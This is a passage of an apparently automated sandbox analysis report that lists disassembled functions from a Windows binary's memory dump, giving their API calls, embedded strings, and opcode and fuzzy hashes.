                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                            • String ID:
                                                                            • API String ID: 1535828850-0
                                                                            • Opcode ID: 0b13455cdaeb3fc53bbb55d95631fdf7aff9485ccba3b40e9fd5328a765c9b99
                                                                            • Instruction ID: f1f09e6476f8f0ddb309925c4eb960ce9aff19399c88f60e2076adfd6d956162
                                                                            • Opcode Fuzzy Hash: 0b13455cdaeb3fc53bbb55d95631fdf7aff9485ccba3b40e9fd5328a765c9b99
                                                                            • Instruction Fuzzy Hash: FDC16F75A00215CFDB25DF18C895BA9BBF6FB48314F5481EAD50A9B691EB309EC2CF40
                                                                            Function 00B05190 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_setjmp3
                                                                            • String ID:
                                                                            • API String ID: 4215035025-0
                                                                            • Opcode ID: 76e0b0d5fa2a3dbfd929551d6889553f523cb39e83710145ce64063e23840fdc
                                                                            • Instruction ID: 95d2c9a01679d2a9700ef2e65e64b5507db2b55cdbec9595af8efc6eda65cde5
                                                                            • Opcode Fuzzy Hash: 76e0b0d5fa2a3dbfd929551d6889553f523cb39e83710145ce64063e23840fdc
                                                                            • Instruction Fuzzy Hash: FC515EB1A012699BDB24CBA5DC94AEFBBB8EB44340F5440E9E509A3580DB308F84CF65
                                                                            Function 00B295F2 Relevance: 7.6, APIs: 5, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B29631
                                                                            • memset.MSVCRT ref: 00B2964F
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • _wcsicmp.MSVCRT ref: 00B296FD
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 00B2971B
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 00B29733
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_wcsicmp
                                                                            • String ID:
                                                                            • API String ID: 1670951261-0
                                                                            • Opcode ID: 45d4d9d1ec3b0f36169e549b1402d1e01a9b6c2e6970a2658f429fba2009cd45
                                                                            • Instruction ID: 494077a31d9761ebfbd943345dc5aaa84c5acc2de7bfe159f4e3c070cf66386d
                                                                            • Opcode Fuzzy Hash: 45d4d9d1ec3b0f36169e549b1402d1e01a9b6c2e6970a2658f429fba2009cd45
                                                                            • Instruction Fuzzy Hash: D6416F71A202295BDF24CAA5DC95BAEB7F8EF14344F4400E9E509E3181DB34DE84CAA5
                                                                            Function 00B294E0 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B29527
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B2952F
                                                                            • _get_osfhandle.MSVCRT ref: 00B295B5
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B295BD
                                                                              • Part of subcall function 00B28C50: longjmp.MSVCRT(00B40A70,00000001,00B0206C,00B05E68,?,?,?,?,00000000), ref: 00B28CC4
                                                                              • Part of subcall function 00B28C50: memset.MSVCRT ref: 00B28D1D
                                                                              • Part of subcall function 00B28C50: memset.MSVCRT ref: 00B28D45
                                                                              • Part of subcall function 00B28C50: memset.MSVCRT ref: 00B28D6D
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B295CC
                                                                              • Part of subcall function 00B0A16C: _close.MSVCRT ref: 00B0A19B
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                                                            • String ID:
                                                                            • API String ID: 288106245-0
                                                                            • Opcode ID: 4e827f70a0a79874073f3ea8462dbfe98e05123e5837b1356960c4a73ab2ff63
                                                                            • Instruction ID: aba37666109c55973178bea40bcc2222618f5c274fdcd74365f80c6d14d3707e
                                                                            • Opcode Fuzzy Hash: 4e827f70a0a79874073f3ea8462dbfe98e05123e5837b1356960c4a73ab2ff63
                                                                            • Instruction Fuzzy Hash: 4531E175B00214AFEF19DF74E849BAE77A9EB54320F2081A9F50AD7280DF74DE418B50
                                                                            Function 00B1260E Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00B11775,-00000001,-00000001,-00000001,-00000001), ref: 00B12650
                                                                            • _get_osfhandle.MSVCRT ref: 00B1F339
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00B11775,-00000001,-00000001,-00000001,-00000001), ref: 00B1F347
                                                                            • longjmp.MSVCRT(00B40A30,00000001,?,00000104,00000000,?,?,00B11775,-00000001,-00000001,-00000001,-00000001), ref: 00B1F383
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00B187F0,?,?,?,00B187F0,00000000,?,00B04A0A), ref: 00B1F390
                                                                              • Part of subcall function 00B0DD98: _get_osfhandle.MSVCRT ref: 00B0DDA3
                                                                              • Part of subcall function 00B0DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B1C050), ref: 00B0DDAD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: BufferConsoleInfoScreen$Heap_get_osfhandle$AllocFileProcessTypelongjmp
                                                                            • String ID:
                                                                            • API String ID: 158340877-0
                                                                            • Opcode ID: 33a8d006ea15899508639c70facd17648066ae2d40004d612cfc551fd7e8e507
                                                                            • Instruction ID: c212cdccb3f6130d4898810422df0c8b4f9627934f93b9ec0423d976cf804cfb
                                                                            • Opcode Fuzzy Hash: 33a8d006ea15899508639c70facd17648066ae2d40004d612cfc551fd7e8e507
                                                                            • Instruction Fuzzy Hash: D931B171A003069FEB249F74D885ABEB7F8FF44751B5045AEE846C3290EB74D941CB51
                                                                            Function 00B14CA0 Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B14CC2
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B28FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00B14CCA
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B20BFC
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B20C48
                                                                            • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B20C71
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 3588551418-0
                                                                            • Opcode ID: fe3313f4d88bc44fcb0cad1f25db932e028e526486beb90a1d5a3f7a0782341d
                                                                            • Instruction ID: e235e3e2ea990c188a97b5bed3f667ad41ca3119e0aa792159107c5048aa9013
                                                                            • Opcode Fuzzy Hash: fe3313f4d88bc44fcb0cad1f25db932e028e526486beb90a1d5a3f7a0782341d
                                                                            • Instruction Fuzzy Hash: 4A31DF71610105EFEF18AF20E885ABE7BE9FF46714B6044B9E806D3291DB349D80CB61
                                                                            Function 00B0E272 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B0E29B
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B0E2A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 1013686580-0
                                                                            • Opcode ID: e1b86411f9ad274f1222d61436e33dca8cfc9aa1105f6233688ffa09e39c7cc5
                                                                            • Instruction ID: a662435e595a744d5317085266c40cf5ace4d88a68e8db8197efc108b6d153a2
                                                                            • Opcode Fuzzy Hash: e1b86411f9ad274f1222d61436e33dca8cfc9aa1105f6233688ffa09e39c7cc5
                                                                            • Instruction Fuzzy Hash: 28112536248200AFE3243B64EC8EF5A7BD5FB45761F71049AF10A9B1E0DFA19DC0DA11
                                                                            Function 00B28550 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B0DD98: _get_osfhandle.MSVCRT ref: 00B0DDA3
                                                                              • Part of subcall function 00B0DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B1C050), ref: 00B0DDAD
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00B28571
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00B2857E
                                                                            • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00000000,?,?), ref: 00B285C7
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00000000), ref: 00B285D5
                                                                            • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00B285DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 3008996577-0
                                                                            • Opcode ID: 46d22e4ace9d78f267d341265546af776497997f3a8cb99ada08e2c7a7ac1733
                                                                            • Instruction ID: e23d2671d0d0ba21801fefd92956b639af93336213bdd9aa86fad2c08f0af8e0
                                                                            • Opcode Fuzzy Hash: 46d22e4ace9d78f267d341265546af776497997f3a8cb99ada08e2c7a7ac1733
                                                                            • Instruction Fuzzy Hash: 3A11263A9002499ACB04EFF49C05AEEB7F8FF0E710F10415AE515F7290EE308A05CB6A
                                                                            Function 00B170F5 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00B17122
                                                                            • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00B17131
                                                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00B1713A
                                                                            • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00B17143
                                                                            • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00B17158
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                            • String ID:
                                                                            • API String ID: 1445889803-0
                                                                            • Opcode ID: 62273c9e0d3601c4238bd88b760db840741607d06c913adf502af8af28663816
                                                                            • Instruction ID: cb447726e994e0655f3397dc1ef08f59f871aa96b40e92379b4c8b204492316a
                                                                            • Opcode Fuzzy Hash: 62273c9e0d3601c4238bd88b760db840741607d06c913adf502af8af28663816
                                                                            • Instruction Fuzzy Hash: 2E115E75D45208EBCB10DFB8D94869EB7F5FF58310FA10899D401E7254EB709B419B01
                                                                            Function 00B24840 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,00B187E5,00000000,?,00B04A0A), ref: 00B2484A
                                                                              • Part of subcall function 00B0DD98: _get_osfhandle.MSVCRT ref: 00B0DDA3
                                                                              • Part of subcall function 00B0DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B1C050), ref: 00B0DDAD
                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,00B187E5,00000000,?,00B04A0A), ref: 00B24879
                                                                            • _getch.MSVCRT ref: 00B2487F
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00B187E5,00000000,?,00B04A0A), ref: 00B24897
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00B187E5,00000000,?,00B04A0A), ref: 00B248AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                            • String ID:
                                                                            • API String ID: 491502236-0
                                                                            • Opcode ID: 0d0e19efbe5466791908c2ae5a811ae50948a1bcf412cae616c9356b53b358ff
                                                                            • Instruction ID: d390b0a9e15724789ded5b1d3b410679b1e25bec19ac110202eb9b58dcce2217
                                                                            • Opcode Fuzzy Hash: 0d0e19efbe5466791908c2ae5a811ae50948a1bcf412cae616c9356b53b358ff
                                                                            • Instruction Fuzzy Hash: 9A01A735154264AFE7196BA1EC0EB5E3BE4EF02721F100299F809DB1E1DFB18E40CB95
                                                                            Function 00B06488 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B06513: memset.MSVCRT ref: 00B06593
                                                                              • Part of subcall function 00B0DC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00B08E86,00B08E5A,00000000), ref: 00B0DC98
                                                                              • Part of subcall function 00B0DC60: RtlFreeHeap.NTDLL ref: 00B0DC9F
                                                                            • memset.MSVCRT ref: 00B1A097
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heapmemset$FreeProcess
                                                                            • String ID: *.*
                                                                            • API String ID: 1291122668-438819550
                                                                            • Opcode ID: cef0519c1004123100f410f29c8479d0fdeec761c9c20706e1ea69e4e5b1763a
                                                                            • Instruction ID: ce574dc9147515eb0143ae9b9da434ec70efdf8c456c8305ecbb243ce27e0b14
                                                                            • Opcode Fuzzy Hash: cef0519c1004123100f410f29c8479d0fdeec761c9c20706e1ea69e4e5b1763a
                                                                            • Instruction Fuzzy Hash: 4DB1D071D01208AFDF24EFA4C885AEEBBF1EF59710F5440A9E805AB291D731ED91CB91
                                                                            Function 00B25948 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 252registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00B25997
                                                                              • Part of subcall function 00B0AB7F: iswspace.MSVCRT ref: 00B0AB8D
                                                                              • Part of subcall function 00B0AB7F: wcschr.MSVCRT ref: 00B0AB9E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Enumiswspacewcschr
                                                                            • String ID: %s=%s$\Shell\Open\Command
                                                                            • API String ID: 3493821229-3301834661
                                                                            • Opcode ID: 7dd58f464fed4a9c05fb26fe250194cf7d7be7f3374cf7eb3b61a745eb3144ed
                                                                            • Instruction ID: 523e9525e87f9cf15ff4eee7068e291bb44cd1c53daa5cf721bfa85daf34f5c9
                                                                            • Opcode Fuzzy Hash: 7dd58f464fed4a9c05fb26fe250194cf7d7be7f3374cf7eb3b61a745eb3144ed
                                                                            • Instruction Fuzzy Hash: 18811D75E006295BDB349B28EC96BFA77F9EF94700F1481E9E40E97181EA709E818B50
                                                                            Function 00B0CCD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 178COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                                                            • API String ID: 0-1704545398
                                                                            • Opcode ID: 555e858511d41d43974dc2e392c178744381b73e1c68fca5b3f36b43f4854e3d
                                                                            • Instruction ID: 22deda653eefbe88615aaf95c1dd2e79ad644389954de3d6a76993473766a70b
                                                                            • Opcode Fuzzy Hash: 555e858511d41d43974dc2e392c178744381b73e1c68fca5b3f36b43f4854e3d
                                                                            • Instruction Fuzzy Hash: 5F515832A0010196DB20BB64D85977A7FE2FB50354F6587F9E9068B2E1EFB1DD80C791
                                                                            Function 00B24DBD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: iswdigit$wcstol
                                                                            • String ID: aApP
                                                                            • API String ID: 644763121-2547155087
                                                                            • Opcode ID: a862853ce4744f3bff5955e3df240336f66e0237394142d3fc797b2865ca6a88
                                                                            • Instruction ID: b8c82e0f1fada49cc099c993fb9135087250b4fbba313a55480ebfd80187254e
                                                                            • Opcode Fuzzy Hash: a862853ce4744f3bff5955e3df240336f66e0237394142d3fc797b2865ca6a88
                                                                            • Instruction Fuzzy Hash: 6641F73560023286DF28AF68E49117FB3F5FF9530071648AAE90EDBA84EB30DD42C761
                                                                            Function 00B257A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00B257F8
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00B25886
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: EnumErrorLast
                                                                            • String ID: %s=%s$.
                                                                            • API String ID: 1967352920-4275322459
                                                                            • Opcode ID: 7f6fe4b755f279608f5418098124ccabc0b5e8550f5ad954a30a50b89e2cd4ca
                                                                            • Instruction ID: 84e895daa6c0fd7eb7574b63df068f6c36a7ff93aa644a5fdc2aebc3318eed5c
                                                                            • Opcode Fuzzy Hash: 7f6fe4b755f279608f5418098124ccabc0b5e8550f5ad954a30a50b89e2cd4ca
                                                                            • Instruction Fuzzy Hash: 9A415B71E4063997CF34AB259C95ABF77E9EF94310F1441EDE80E9B281DEB04E81CA90
                                                                            Function 00B2A759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B2A79F
